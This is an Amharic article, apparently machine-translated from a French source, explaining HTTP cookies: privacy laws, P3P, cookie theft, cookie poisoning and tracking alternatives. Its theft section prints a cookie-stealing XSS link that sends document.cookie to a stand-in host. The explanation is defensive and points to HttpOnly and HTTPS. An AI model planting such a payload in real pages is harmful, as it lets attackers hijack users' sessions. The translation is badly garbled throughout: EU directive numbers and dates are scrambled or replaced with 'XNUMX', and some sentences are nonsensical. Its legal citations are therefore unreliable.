የዩናይትድ ስቴትስ መንግስት በ2000 በኩኪዎች አቀማመጥ ላይ ጥብቅ ህጎችን ተግባራዊ ያደረገ ሲሆን የዋይት ሀውስ የመድሃኒት ፖሊሲ ቢሮ የመስመር ላይ የመድሃኒት ማስታወቂያዎችን የሚመለከቱ የተጠቃሚዎችን ኮምፒዩተሮች ለመከታተል ኩኪዎችን እንደሚጠቀም ከታወቀ በኋላ. እ.ኤ.አ. በ 2002 የግላዊነት ተሟጋች ዳንኤል ብራንት ሲአይኤ ድረ-ገጾቹን በጎበኙ ኮምፒውተሮች ላይ የማያቋርጥ ኩኪዎችን እንደሚተው አወቀ። አንዴ ይህ ጥሰት ሲታወቅ፣ ሲአይኤ እነዚህ ኩኪዎች ሆን ተብሎ እንዳልተላከ ገልጾ ማዘጋጀቱን አቆመ። በታህሳስ 25 ቀን 2005 ብራንት የብሄራዊ ደህንነት ኤጀንሲ (NSA) በሶፍትዌር ማሻሻያ ምክንያት ሁለት ቋሚ ኩኪዎችን በጎብኝዎች ኮምፒውተሮች ላይ እንደተወ አወቀ። ከማሳወቂያ በኋላ፣ NSA ወዲያውኑ ኩኪዎችን አሰናክሏል።
በዩናይትድ ኪንግደም እ.ኤ.አ የኩኪ ህግ እ.ኤ.አ. ሜይ 25 ቀን 2012 ሥራ ላይ የዋለ፣ ድረ-ገጾቹ ዓላማቸውን እንዲገልጹ ያስገድዳቸዋል፣ ስለዚህ ተጠቃሚዎቹ ዱካዎቻቸውን ለመተው ወይም ላለመጠቀም በበይነመረብ ላይ እንዲመርጡ ያስችላቸዋል። ስለዚህ ከማስታወቂያ ኢላማዎች ሊጠበቁ ይችላሉ። ሆኖም፣ አጭጮርዲንግ ቶ ዘ ጋርዲያን, የበይነመረብ ተጠቃሚዎች ፈቃድ የግድ ግልጽ አይደለም; በተጠቃሚ ፈቃድ ውሎች ላይ ለውጦች ተደርገዋል ፣ ይህም ያደርገዋል ስለዚህም ተጠቁሟል.
መመሪያ 2002/58 በግላዊነት ላይ
መመሪያ 202/58 ግላዊነት እና ኤሌክትሮኒክስ ግንኙነቶች፣ ኩኪዎችን አጠቃቀም ላይ ህጎችን ይዟል። በተለይም የዚህ መመሪያ አንቀጽ 5 አንቀጽ 3 የውሂብ ማከማቻ (እንደ ኩኪዎች ያሉ) በተጠቃሚው ኮምፒዩተር ውስጥ ሊደረግ የሚችለው፡-
- ተጠቃሚው መረጃው እንዴት ጥቅም ላይ እንደሚውል ያሳውቃል;
- ተጠቃሚው ይህንን የማከማቻ ክዋኔ ውድቅ የማድረግ አማራጭ ተሰጥቶታል። ነገር ግን፣ ይህ አንቀጽ በተጨማሪ በቴክኒካዊ ምክንያቶች የውሂብ ማከማቻ ከዚህ ህግ ነፃ እንደሆነ ይገልጻል።
ከኦክቶበር 2003 ጀምሮ ተግባራዊ በመሆኑ መመሪያው በታህሳስ 2004 በወጣ ዘገባ መሰረት ተግባራዊ የተደረገው ፍጽምና የጎደለው ብቻ ሲሆን ይህም የተወሰኑ አባል ሀገራት (ስሎቫኪያ፣ ላትቪያ፣ ግሪክ፣ ቤልጂየም እና ሉክሰምበርግ) እስካሁን እንዳልተሸጋገሩ አመልክቷል። የአገር ውስጥ ህግ መመሪያ.
እንደ G29 እ.ኤ.አ. እንደውም አብዛኞቹ ድረ-ገጾች መመሪያውን በማያከብር መንገድ እራሳቸውን በመገደብ ስለ "ኩኪዎች" አጠቃቀም መረጃ ሳይሰጡ "ቴክኒካል" ኩኪዎችን ሳይለዩ በቀላል "ባነር" በመገደብ ነው. ኩኪዎችን "ክትትል" ማድረግ፣ ወይም ቴክኒካል ኩኪዎችን (እንደ የግዢ ጋሪ አስተዳደር ኩኪዎች ያሉ) ለማቆየት ለሚፈልግ ተጠቃሚ እና "ክትትል" ኩኪዎችን ላለመቀበል እውነተኛ ምርጫን መስጠት። እንደ እውነቱ ከሆነ ኩኪዎች ውድቅ ከተደረጉ ብዙ ጣቢያዎች በትክክል አይሰሩም, ይህም መመሪያ 2010/2002 ወይም መመሪያ 58/95 (የግል ውሂብ ጥበቃ) አያከብርም.
መመሪያ 2009/136/እ.ኤ.አ
ይህ ጽሑፍ በህዳር 2009 ቀን 136 በወጣው መመሪያ 25/2009/EC ተዘምኗል።ይህም “መረጃ ማከማቸት ወይም አስቀድሞ የተከማቸ መረጃን ማግኘት በደንበኝነት ወይም ተጠቃሚ ተርሚናል መሳሪያዎች ውስጥ የሚፈቀደው በህዳር 95 ቀን 46 ነው። ተመዝጋቢው ወይም ተጠቃሚው በመመሪያው XNUMX/XNUMX/EC ግልጽ እና የተሟላ መረጃን በማክበር በሌሎች መካከል ስለ ሂደቱ ዓላማዎች ከተቀበለ በኋላ ፈቃዱን ሰጥቷል። ስለዚህ አዲሱ መመሪያ ኩኪዎችን በኢንተርኔት ተጠቃሚ ኮምፒዩተር ላይ ከማስቀመጥ በፊት ያሉትን ግዴታዎች ያጠናክራል።
በመመሪያው የመጀመሪያ ደረጃ ግምት ውስጥ የአውሮፓ ህግ አውጭው ግን እንዲህ በማለት ይገልፃል፡- “በቴክኒካል የሚቻል እና ውጤታማ በሆነበት በመመሪያ 95/46/EC አግባብነት ባለው መመሪያ መሰረት የተጠቃሚው ፈቃድ ሂደቱን በሚመለከት ሊገለጽ ይችላል። ተገቢውን የአሳሽ ወይም የሌላ መተግበሪያ ቅንብሮችን መጠቀም። ግን እንደ እውነቱ ከሆነ እስከዛሬ ድረስ የትኛውም አሳሽ አስፈላጊ የሆኑትን ቴክኒካል ኩኪዎች ከተመረጡት ለተጠቃሚው ምርጫ መተው አለበት።
ይህ አዲስ መመሪያ በቤልጂየም የፓርላማ አባላት በጁላይ 2012 ተላልፏል። እ.ኤ.አ. በ2014 የተደረገ ጥናት እንደሚያሳየው የፓርላማ አባላት እንኳን ለማመልከት ይቸገራሉ። የመመሪያው ገደቦች.
P3P
የP3P ዝርዝር መግለጫ አገልጋይ ምን አይነት መረጃ እንደሚሰበስብ እና ለምን ዓላማ እንደሚገልፅ የግላዊነት ፖሊሲን የመግለጽ ችሎታን ያካትታል። እነዚህ ፖሊሲዎች ኩኪዎችን በመጠቀም የተሰበሰቡ መረጃዎችን መጠቀምን ያካትታሉ (ነገር ግን በእነዚህ ብቻ ያልተገደቡ)። እንደ P3P ትርጓሜ፣ አሳሽ የግላዊነት ፖሊሲዎችን ከተጠቃሚው ምርጫዎች ጋር በማነፃፀር ወይም ተጠቃሚውን በመጠየቅ በአገልጋዩ የተገለፀውን የግላዊነት ፖሊሲ ግላዊነት መግለጫ በማቅረብ ኩኪዎችን መቀበል ወይም አለመቀበል ይችላል።
አፕል ሳፋሪ እና ማይክሮሶፍት ኢንተርኔት ኤክስፕሎረር ስሪቶች 6 እና 7ን ጨምሮ ብዙ አሳሾች P3Pን ይደግፋሉ ይህም አሳሹ የሶስተኛ ወገን የኩኪ ማከማቻ ይቀበል እንደሆነ ለመወሰን ያስችላል። የኦፔራ አሳሽ ተጠቃሚዎች የሶስተኛ ወገን ኩኪዎችን እንዲከለክሉ እና ለኢንተርኔት ጎራዎች አለምአቀፋዊ እና ልዩ የደህንነት መገለጫ እንዲፈጥሩ ያስችላቸዋል። የሞዚላ ፋየርፎክስ ስሪት 2 የP3P ድጋፍን ቢያቆምም በስሪት 3 ወደነበረበት መልሰዋል።
የሶስተኛ ወገን ኩኪዎች የተጠቃሚውን የድር ልምድ ላይ አሉታዊ ተጽዕኖ ሳያሳድሩ ግላዊነትን ለመጨመር እና የማስታወቂያ ክትትልን ለመቀነስ በአብዛኛዎቹ አሳሾች ሊታገዱ ይችላሉ። ብዙ የማስታወቂያ ኤጀንሲዎች አማራጭ ይሰጣሉ መርጦ መውጣት ለታለመው ማስታወቂያ በአሳሹ ውስጥ ይህን ኢላማ ማድረግን የሚያሰናክል አጠቃላይ ኩኪን በማዘጋጀት ፣ ግን እንዲህ ዓይነቱ መፍትሄ በተጨባጭ ውጤታማ አይደለም ፣ ግን ሲከበር ይህ አጠቃላይ ኩኪ ይሰረዛል ። ውሳኔ.
የኩኪዎች ጉዳቶች
ከግላዊነት ጉዳዮች በተጨማሪ ኩኪዎች አንዳንድ ቴክኒካዊ ድክመቶች አሏቸው። በተለይም ተጠቃሚዎችን ሁልጊዜ በትክክል አይለዩም, ብዙ ቁጥር ሲኖራቸው, ለደህንነት ጥቃቶች ጥቅም ላይ ሊውሉ በሚችሉበት ጊዜ የጣቢያን አፈፃፀም ሊያዘገዩ ይችላሉ, እና ከተወካዩ የስቴት ሽግግር, የሶፍትዌሩ የስነ-ህንፃ ዘይቤ ጋር ይጋጫሉ.
ትክክለኛ ያልሆነ መለያ
በኮምፒተር ላይ ከአንድ በላይ አሳሽ ጥቅም ላይ ከዋለ በእያንዳንዳቸው ውስጥ ሁል ጊዜ ለኩኪዎች የተለየ የማከማቻ ክፍል አለ። ስለዚህ ኩኪዎች አንድን ሰው አይለዩም ነገር ግን የተጠቃሚ መለያ፣ ኮምፒውተር እና የድር አሳሽ ጥምር ናቸው። ስለዚህ ማንም ሰው እነዚህን የኩኪዎች ብዛት ያላቸውን መለያዎች፣ ኮምፒውተሮች ወይም አሳሾች ሊጠቀም ይችላል። በተመሳሳይ፣ ኩኪዎች አንድ አይነት የተጠቃሚ መለያ፣ ኮምፒውተር እና አሳሽ በሚጋሩ እንደ "ኢንተርኔት ካፌዎች" ውስጥ ወይም የኮምፒዩተር ግብዓቶችን ነፃ መዳረሻ በሚሰጡ በርካታ ተጠቃሚዎች መካከል ያለውን ልዩነት አያሳዩም።
ግን በተግባር ግን ይህ አባባል በአብዛኛዎቹ ጉዳዮች የተሳሳተ ይሆናል ምክንያቱም ዛሬ "የግል" ኮምፒዩተር (ወይም ስማርትፎን ወይም ታብሌቱ ከዚህ የከፋው) በዋነኝነት የሚጠቀመው በአንድ ግለሰብ ነው። በተሰበሰበው መረጃ መጠን ግለሰቡ “በስም” ባይታወቅም ወደ ግላዊ ኢላማ መድረስ።
የኩኪዎች ስርቆት
ኩኪ በኔትወርኩ ላይ በሌላ ኮምፒውተር ሊሰረቅ ይችላል።
በመደበኛ ስራ ጊዜ ኩኪዎች በአገልጋዩ (ወይም በተመሳሳይ ጎራ ውስጥ ባሉ የአገልጋዮች ቡድን) እና በተጠቃሚው የኮምፒውተር አሳሽ መካከል ተመልሰው ይላካሉ። ኩኪዎች ሚስጥራዊነት ያለው መረጃ (የተጠቃሚ ስም፣ ለማረጋገጫ የሚውለው የይለፍ ቃል፣ ወዘተ) ሊይዙ ስለሚችሉ እሴቶቻቸው ለሌሎች ኮምፒውተሮች ተደራሽ መሆን የለባቸውም። ኩኪ መስረቅ ባልተፈቀደ የሶስተኛ ወገን ኩኪዎችን የመጥለፍ ተግባር ነው።
የክፍለ ጊዜ ጠለፋ በሚባል ጥቃት ኩኪዎችን በፓኬት አነጣጥሮ ሊሰረቅ ይችላል። በኔትወርኩ ላይ ያለው ትራፊክ ከላከ እና ከሚቀበሉት (በተለይ ባልተመሰጠረው የወል ዋይ ፋይ ቦታ) ኮምፒውተሮች ሊጠለፍ እና ሊነበብ ይችላል። ይህ ትራፊክ ግልጽ የሆነውን የኤችቲቲፒ ፕሮቶኮል በመጠቀም በክፍለ-ጊዜዎች የሚላኩ ኩኪዎችን ያካትታል። የአውታረ መረብ ትራፊክ ኢንክሪፕት በማይደረግበት ጊዜ ተንኮል አዘል ተጠቃሚዎች በኔትወርኩ ላይ የሌሎች ተጠቃሚዎችን ግንኙነት "ፓኬት አነፍናፊዎች" በመጠቀም ማንበብ ይችላሉ።
ይህንን ችግር በኤችቲቲፒኤስ ፕሮቶኮል በመጠቀም በተጠቃሚው ኮምፒውተር እና በአገልጋዩ መካከል ያለውን ግንኙነት በማመስጠር ሊወጣ ይችላል። አገልጋይ ሀን ሊገልጽ ይችላል። አስተማማኝ ባንዲራ ኩኪን ሲያቀናብሩ; አሳሹ በአስተማማኝ መስመር ላይ ብቻ ይልካል፣ ለምሳሌ እንደ SSL ግንኙነት።
ይሁን እንጂ ብዙ ጣቢያዎች ምንም እንኳን ለተጠቃሚ ማረጋገጫ HTTPS የተመሰጠረ ግንኙነትን ቢጠቀሙም (ማለትም የመግቢያ ገጹ) በኋላ የክፍለ ጊዜ ኩኪዎችን እና ሌሎች መረጃዎችን ለውጤታማነት ምክንያቶች ባልተመሰጠሩ የኤችቲቲፒ ግንኙነቶች ይልካሉ። ስለዚህ አጥቂዎች የሌሎች ተጠቃሚዎችን ኩኪዎች መጥለፍ እና ተገቢ በሆኑ ጣቢያዎች ላይ ማስመሰል ወይም በኩኪ ጥቃቶች ሊጠቀሙባቸው ይችላሉ።
በጣቢያው ውስጥ ስክሪፕት ማድረግ፡- በአገልጋዩ እና በደንበኛው መካከል ብቻ መለዋወጥ ያለበት ኩኪ ለሌላ ሶስተኛ ወገን ይላካል።
ኩኪዎችን ለመስረቅ ሌላው መንገድ ጣቢያዎችን ስክሪፕት ማድረግ እና አሳሹ ራሱ ኩኪዎችን ወደ ተንኮል አዘል አገልጋዮች እንዲልክ ማድረግ ነው። ዘመናዊ አሳሾች ከአገልጋዩ የሚፈለጉትን የኮድ ክፍሎች እንዲፈቅዱ ይፈቅዳሉ። በሂደት ጊዜ ኩኪዎች ከተደረሱ እሴቶቻቸው ሊደርሱባቸው ለማይገባቸው አገልጋዮች በተወሰነ መልኩ ሊተላለፉ ይችላሉ። በአውታረ መረቡ ላይ ከመላካቸው በፊት ኩኪዎችን ማመስጠር ጥቃቱን ለማደናቀፍ አይረዳም።
የዚህ አይነት የውስጠ-ገፅ ስክሪፕት በተለምዶ ተጠቃሚዎች ኤችቲኤምኤል ይዘትን እንዲለጥፉ በሚፈቅዱ ድረ-ገጾች ላይ በአጥቂዎች ነው የሚሰራው። በኤችቲኤምኤል አስተዋፅዖ ውስጥ ያለውን ተኳሃኝ ኮድ አካል በማዋሃድ አጥቂ ከሌሎች ተጠቃሚዎች ኩኪዎችን መቀበል ይችላል። የእነዚህ ኩኪዎች እውቀት የተሰረቁትን ኩኪዎች በመጠቀም ከተመሳሳዩ ድረ-ገጽ ጋር በመገናኘት መጠቀም ይቻላል፣በዚህም ኩኪዎቹ የተሰረቁበት ተጠቃሚ እንደሆኑ ይታወቃል።
እንደዚህ አይነት ጥቃቶችን ለመከላከል አንዱ መንገድ የHttpOnly ባንዲራ መጠቀም ነው። ይህ አማራጭ ነው፣ ከ6ኛው የኢንተርኔት ኤክስፕሎረር ስሪት ጀምሮ በPHP ውስጥ ከስሪት 5.2.0 ጀምሮ የገባው ኩኪውን ለስክሪፕቱ ቅርብ ለደንበኛው እንዳይደርስ ለማድረግ ታቅዷል። ነገር ግን፣ የድር ገንቢዎች በድረ-ገፁ ውስጥ ስክሪፕት እንዳይኖራቸው ለመከላከል ይህንን በድረገጻቸው እድገት ላይ ግምት ውስጥ ማስገባት አለባቸው።
ሌላው ጥቅም ላይ የዋለው የደህንነት ስጋት በጣቢያው ውስጥ የፍላጎት ፈጠራ ነው።
ኦፊሴላዊው ቴክኒካዊ መግለጫ ኩኪዎችን ወደ መጡበት ጎራ ውስጥ ላሉ አገልጋዮች ብቻ እንዲላክ ይፈቅዳል። ነገር ግን፣ የኩኪዎች ዋጋ ከኩኪ ራስጌዎች ሌላ መንገዶችን በመጠቀም ወደ ሌሎች አገልጋዮች ሊላክ ይችላል።
በተለይም እንደ ጃቫ ስክሪፕት ያሉ የስክሪፕት ቋንቋዎች በአጠቃላይ የኩኪ እሴቶችን እንዲደርሱ ተፈቅዶላቸዋል እና የዘፈቀደ እሴቶችን ወደ በይነመረብ ለማንኛውም አገልጋይ መላክ ይችላሉ። ይህ የስክሪፕት ችሎታ ተጠቃሚዎች ሌሎች ተጠቃሚዎች እንዲያዩት HTML ይዘት እንዲለጥፉ ከሚያስችላቸው ድረ-ገጾች ጥቅም ላይ ይውላል።
ለምሳሌ፣ በ example.com ጎራ ላይ የሚሠራ አጥቂ የሚከተለውን ሊንክ የያዘ አስተያየት ሊለጥፍ ይችላል፡ ወደ ታዋቂ ብሎግ ይጠቁማል፡ በሌላ መልኩ አይቆጣጠሩትም፡
<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>
ሌላ ተጠቃሚ በዚህ ሊንክ ላይ ጠቅ ሲያደርግ አሳሹ በጠቅታ የሚታየውን የኮዱ ክፍል ያከናውናል፣ ስለዚህ የሰነድ.ኩኪ ሕብረቁምፊውን ለዚህ ገጽ ንቁ በሆኑ የተጠቃሚ ኩኪዎች ዝርዝር ይተካል። ስለዚህ, ይህ የኩኪዎች ዝርዝር ወደ example.com አገልጋይ ይላካል, እናም አጥቂው የዚህን ተጠቃሚ ኩኪዎች መሰብሰብ ይችላል.
የዚህ ዓይነቱ ጥቃት በተጠቃሚው በኩል ለመለየት አስቸጋሪ ነው ምክንያቱም ስክሪፕቱ የመጣው ኩኪውን ከሚያዘጋጀው ተመሳሳይ ጎራ ነው እና እሴቶቹን የመላክ ክዋኔ በዚያ ጎራ የተፈቀደ ይመስላል። ተንኮል-አዘል ኮድ እንዳይታተም የሚከለክሉ ገደቦችን ማስቀመጥ የዚህ አይነት ጣቢያ የሚንቀሳቀሱ አስተዳዳሪዎች ኃላፊነት እንደሆነ ይቆጠራል።
ኩኪዎች ከHttpOnly ባንዲራ ጋር ከተላኩ እንደ ጃቫ ስክሪፕት ካሉ ደንበኛ ጋር በቀጥታ አይታዩም። ከአገልጋዩ እይታ፣ ልዩነቱ በሴት-ኩኪ ራስጌ መስመር ላይ HttpOnly የሚለውን ሕብረቁምፊ የያዘ አዲስ መስክ መጨመሩ ብቻ ነው።
Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly
አሳሹ እንደዚህ አይነት ኩኪን ሲቀበል በሚከተለው የኤችቲቲፒ ልውውጥ ውስጥ በመደበኛነት መጠቀም አለበት, ነገር ግን በደንበኛው በኩል ለተፈጸሙ ስክሪፕቶች እንዲታይ ሳያደርጉት. የHttpOnly ባንዲራ የማንኛውም ይፋዊ ቴክኒካዊ መግለጫ አካል አይደለም፣ እና በሁሉም አሳሾች ውስጥ አልተተገበረም። በXMLHTTPRጥያቄ ዘዴ የክፍለ ጊዜ ኩኪዎችን ማንበብ እና መፃፍ በአሁኑ ጊዜ የሚከለክልበት ምንም መንገድ እንደሌለ ልብ ይበሉ።
የይዘት ማሻሻያ፡ አጥቂ ልክ ያልሆነ ኩኪ ወደ አገልጋይ ይልካል፣ ምናልባትም በአገልጋዩ ከተላከ ትክክለኛ ኩኪ የተሰራ።
ኩኪዎችን መቀየር
ልክ ኩኪዎቹ ተከማችተው ሳይቀየሩ ወደ አገልጋዩ መመለስ እንደሚያስፈልጋቸው አጥቂው ወደ አገልጋዩ ከመላካቸው በፊት የኩኪዎቹን ዋጋ ማሻሻል ይችላል። ለምሳሌ አንድ ኩኪ ተጠቃሚው በመደብሩ የግዢ ጋሪ ውስጥ ለተቀመጡት ዕቃዎች መክፈል ያለበትን ጠቅላላ ዋጋ ከያዘ፣ ይህንን እሴት መቀየር አገልጋዩን አጥቂውን ከመነሻው ያነሰ ክፍያ እንዲከፍል ያደርገዋል። የኩኪዎችን ዋጋ የማሻሻል ሂደት ይባላል የኩኪ መመረዝ እና ጥቃቱ ዘላቂ እንዲሆን ከኩኪ ከተሰረቀ በኋላ ጥቅም ላይ ሊውል ይችላል.
በኩኪ መሻር ዘዴ፣ አጥቂው ልክ ያልሆነ ኩኪ ወደ አገልጋዩ ለመላክ የአሳሽ ስህተት ይጠቀማል።
አብዛኛዎቹ ድረ-ገጾች ግን የክፍለ ጊዜ መታወቂያን ብቻ ያከማቻሉ - በዘፈቀደ የተፈጠረ ልዩ ቁጥር የክፍለ-ጊዜ ተጠቃሚውን ለመለየት ጥቅም ላይ የሚውል - በራሱ ኩኪ ውስጥ፣ ሁሉም ሌሎች መረጃዎች በአገልጋዩ ላይ ተከማችተዋል። በዚህ ጉዳይ ላይ ይህ ችግር በአብዛኛው ተፈትቷል.
በድር ጣቢያዎች መካከል የኩኪ አያያዝ
እያንዳንዱ ጣቢያ የራሱ ኩኪዎች እንዲኖረው ይጠበቃል, ስለዚህ አንድ ጣቢያ ከሌላ ጣቢያ ጋር የተያያዙ ኩኪዎችን መቀየር ወይም መፍጠር መቻል የለበትም. የድር አሳሽ ደህንነት ጉድለት ተንኮል አዘል ጣቢያዎች ይህን ህግ እንዲጥሱ ያስችላቸዋል። የእንደዚህ አይነት ጉድለት ብዝበዛ በተለምዶ ይባላል ተሻጋሪ ቦታ ማብሰል. የእንደዚህ አይነት ጥቃቶች አላማ የክፍለ ጊዜ መታወቂያ ስርቆት ሊሆን ይችላል.
ተጠቃሚዎች እነዚህ ተጋላጭነቶች ከሞላ ጎደል የተወገዱባቸውን የቅርብ ጊዜዎቹን የድር አሳሾች ስሪቶች መጠቀም አለባቸው።
በአገልጋይ እና በደንበኛው መካከል የሚጋጭ ሁኔታ
ኩኪዎችን መጠቀም በደንበኛው ሁኔታ እና በኩኪው ውስጥ በተከማቸ ሁኔታ መካከል ግጭት ሊፈጥር ይችላል። ተጠቃሚው ኩኪ ካገኘ እና በአሳሹ "ተመለስ" ቁልፍ ላይ ጠቅ ካደረገ, የአሳሹ ሁኔታ በአጠቃላይ ከዚህ ግዢ በፊት ከነበረው ጋር ተመሳሳይ አይደለም. ለምሳሌ የመስመር ላይ መደብር ቅርጫት ኩኪዎችን በመጠቀም ከተፈጠረ ተጠቃሚው ወደ አሳሹ ታሪክ ሲመለስ የቅርጫቱ ይዘት ሊለወጥ አይችልም፡ ተጠቃሚው በቅርጫቱ ውስጥ አንድ ጽሑፍ ለመጨመር አንድ ቁልፍ ተጭኖ "ተመለስ" የሚለውን ጠቅ ካደረገ. " አዝራር፣ ጽሑፉ በዚህ ውስጥ ይቀራል። ይህ የተጠቃሚው ፍላጎት ላይሆን ይችላል, እሱም በእርግጠኝነት የጽሑፉን መጨመር መሰረዝ ይፈልጋል. ይህ ወደ አለመተማመን, ግራ መጋባት እና ስህተቶች ሊያመራ ይችላል. ስለዚህ የድር ገንቢዎች ይህንን ችግር አውቀው እንደዚህ አይነት ሁኔታዎችን ለመቆጣጠር እርምጃዎችን መተግበር አለባቸው።
የኩኪ ጊዜው ያበቃል
ቀጣይነት ያለው ኩኪዎች በጊዜ ሂደት ተጠቃሚዎችን እንዲከታተሉ እና ፕሮፋይላቸውን እንዲገነቡ ለማድረግ በግላዊነት ደህንነት ባለሙያዎች ተነቅፈዋል። ይህ የኩኪዎች ገጽታ የክፍለ-ጊዜው የጠለፋ ችግር አካል ነው፣ ምክንያቱም የተሰረቀ የማያቋርጥ ኩኪ ለተወሰነ ጊዜ ተጠቃሚን ለማስመሰል ሊያገለግል ይችላል።
በተጨማሪ አንብብ: GAFAM: እነማን ናቸው? ለምንድነው (አንዳንድ ጊዜ) በጣም የሚያስፈሩት?
ለኩኪዎች አማራጮች
ኩኪዎችን በመጠቀም ሊከናወኑ የሚችሉ አንዳንድ ክዋኔዎች ኩኪዎችን የሚያልፉ ወይም የተሰረዙ ኩኪዎችን የሚፈጥሩ ሌሎች ዘዴዎችን በመጠቀም ሊከናወኑ ይችላሉ፣ ይህም የግላዊነት ጉዳዮችን በተመሳሳይ መንገድ ይፈጥራል (ወይም አንዳንድ ጊዜ ከዚያ የማይታይ ስለሆነ)።
የአይፒ አድራሻ
ተጠቃሚዎች ገጹን በሚጠራው የኮምፒዩተር አይ ፒ አድራሻ መከታተል ይችላሉ። ይህ ዘዴ ከአለም አቀፍ ድር መግቢያ ጀምሮ ይገኛል ፣ ምክንያቱም ገፆች ሲወርዱ አገልጋዩ ምንም ጥቅም ላይ ካልዋለ አሳሹን ወይም ፕሮክሲውን የሚያስኬድ ኮምፒተርን IP አድራሻ ይጠይቃል። አገልጋዩ ይህን መረጃ በአገልግሎት ላይ ያሉ ኩኪዎች መኖራቸውን ወይም አለመኖራቸውን መከታተል ይችላል። ነገር ግን እነዚህ አድራሻዎች በተለምዶ ከኩኪዎች ይልቅ ተጠቃሚን በመለየት ረገድ በጣም አስተማማኝ አይደሉም ምክንያቱም ኮምፒውተሮች እና ፕሮክሲዎች በብዙ ተጠቃሚዎች ሊጋሩ ይችላሉ እና አንድ አይነት ኮምፒዩተር በእያንዳንዱ የስራ ክፍለ ጊዜ የተለየ IP አድራሻ ሊቀበል ይችላል (ለምሳሌ ብዙውን ጊዜ ለስልክ ግንኙነቶች) .
በአይፒ አድራሻዎች መከታተል በአንዳንድ ሁኔታዎች እንደ ብሮድባንድ ግንኙነቶች ተመሳሳይ አይፒ አድራሻን ለረጅም ጊዜ የሚይዝ ኃይል እስካለ ድረስ አስተማማኝ ሊሆን ይችላል።
እንደ ቶር ያሉ አንዳንድ ስርዓቶች የኢንተርኔትን ስም-አልባነት ለመጠበቅ እና በአይፒ አድራሻ መከታተል የማይቻል ወይም ተግባራዊ እንዲሆን ለማድረግ የተነደፉ ናቸው።
ዩ አር ኤል
ይበልጥ ትክክለኛ የሆነ ዘዴ በዩአርኤሎች ውስጥ መረጃን በማካተት ላይ የተመሰረተ ነው. የዩአርኤል መጠይቅ ሕብረቁምፊ ክፍል በተለምዶ ለዚህ ዓላማ ጥቅም ላይ የሚውል አንድ ቴክኒክ ነው፣ ነገር ግን ሌሎች ክፍሎችም እንዲሁ ጥቅም ላይ ሊውሉ ይችላሉ። ሁለቱም የጃቫ አገልጋይ እና የPHP ክፍለ ጊዜ ዘዴዎች ኩኪዎች ካልነቁ ይህንን ዘዴ ይጠቀማሉ።
ይህ ዘዴ የድር አገልጋይ ወደ አሳሹ በሚላክበት ጊዜ የሚሸከመውን የድረ-ገጽ አገናኞች የሕብረቁምፊ ጥያቄዎችን ማያያዝን ያካትታል። ተጠቃሚው አገናኝን ሲከተል አሳሹ የተያያዘውን የጥያቄ ሕብረቁምፊ ወደ አገልጋዩ ይመልሳል።
ለዚህ ዓላማ ጥቅም ላይ የሚውሉ የጥያቄ ሕብረቁምፊዎች እና ኩኪዎች በጣም ተመሳሳይ ናቸው፣ ሁለቱም በዘፈቀደ በአገልጋዩ የተመረጡ እና በአሳሹ የሚመለሱ ናቸው። ሆኖም፣ አንዳንድ ልዩነቶች አሉ፡ የመጠይቅ ሕብረቁምፊን የያዘ ዩአርኤል እንደገና ጥቅም ላይ ሲውል፣ ተመሳሳይ መረጃ ወደ አገልጋዩ ይላካል። ለምሳሌ የተጠቃሚው ምርጫዎች በዩአርኤል መጠይቅ ሕብረቁምፊ ውስጥ ከተቀመጡ እና ተጠቃሚው ያንን ዩአርኤል ለሌላ ተጠቃሚ በኢሜል ከላከ ተጠቃሚው እነዚያን ምርጫዎች መጠቀም ይችላል።
በሌላ በኩል፣ አንድ ተጠቃሚ አንድ አይነት ገጽ ሁለት ጊዜ ሲደርስ፣ ተመሳሳዩ የመጠይቅ ሕብረቁምፊ በሁለቱም ጊዜ ጥቅም ላይ እንደሚውል ዋስትና የለም። ለምሳሌ፣ አንድ ተጠቃሚ ከውስጥ ሳይት ገፅ ላይ ለመጀመሪያ ጊዜ ካረፈ እና ለሁለተኛ ጊዜ በተመሳሳይ ገጽ ላይ ከውጭ ገፅ ካረፈ፣ ከጣቢያው ገጽ አንጻር ያለው የመጠይቅ ሕብረቁምፊ በተለምዶ የተለየ ነው፣ ኩኪዎቹ ግን ተመሳሳይ ናቸው። .
የመጠይቅ ሕብረቁምፊዎች ሌሎች ጉዳቶች ከደህንነት ጋር የተገናኙ ናቸው፡ ክፍለ ጊዜን በመጠይቅ ሕብረቁምፊዎች ውስጥ የሚለይ ውሂብን ማቆየት የክፍለ ጊዜ መጠገኛ ጥቃቶችን፣ የማጣቀሻ ጥቃቶችን እና ሌሎች ብዝበዛዎችን ያነቃቃል ወይም ያቃልላል። የክፍለ ጊዜ መታወቂያዎችን እንደ HTTP ኩኪዎች ማለፍ የበለጠ ደህንነቱ የተጠበቀ ነው።
የተደበቀ ቅጽ መስክ
በASP.NET ጥቅም ላይ የሚውለው የክፍለ-ጊዜ መከታተያ አንዱ ዘዴ የድር ቅጾችን ከተደበቁ መስኮች መጠቀም ነው። ይህ ዘዴ መረጃን ለመያዝ የዩአርኤል መጠይቅ ሕብረቁምፊዎችን ከመጠቀም ጋር በጣም ተመሳሳይ ነው እና ተመሳሳይ ጥቅሞች እና ጉዳቶች አሉት; እና ቅጹ በኤችቲቲፒ GET ዘዴ ከተሰራ መስኮቹ ቅጹን በሚያስገቡበት ጊዜ የሚላከው የአሳሹ ዩአርኤል አካል ይሆናሉ። ግን አብዛኛዎቹ ቅጾች በኤችቲቲፒ POST ይከናወናሉ፣ ይህም የቅጹ መረጃ፣ የተደበቁ መስኮችን ጨምሮ፣ የዩአርኤልም ሆነ የኩኪ አካል ያልሆነ ተጨማሪ ግብአት እንዲጨመር ያደርገዋል።
ይህ አካሄድ ከክትትል አንፃር ሁለት ጥቅሞች አሉት፡ በመጀመሪያ፣ በኤችቲኤምኤል ምንጭ ኮድ እና በPOST ግብአት ላይ የተቀመጠውን መረጃ ከዩአርኤል ይልቅ መከታተል አማካዩ ተጠቃሚ ይህንን ክትትል እንዲያስወግድ ያስችለዋል። ሁለተኛ፣ ተጠቃሚው ዩአርኤሉን ሲገለብጥ የክፍለ ጊዜው መረጃ አይገለበጥም (ገጹን ወደ ዲስክ ለማስቀመጥ ወይም በኢሜል ለመላክ ለምሳሌ)።
መስኮት.ስም
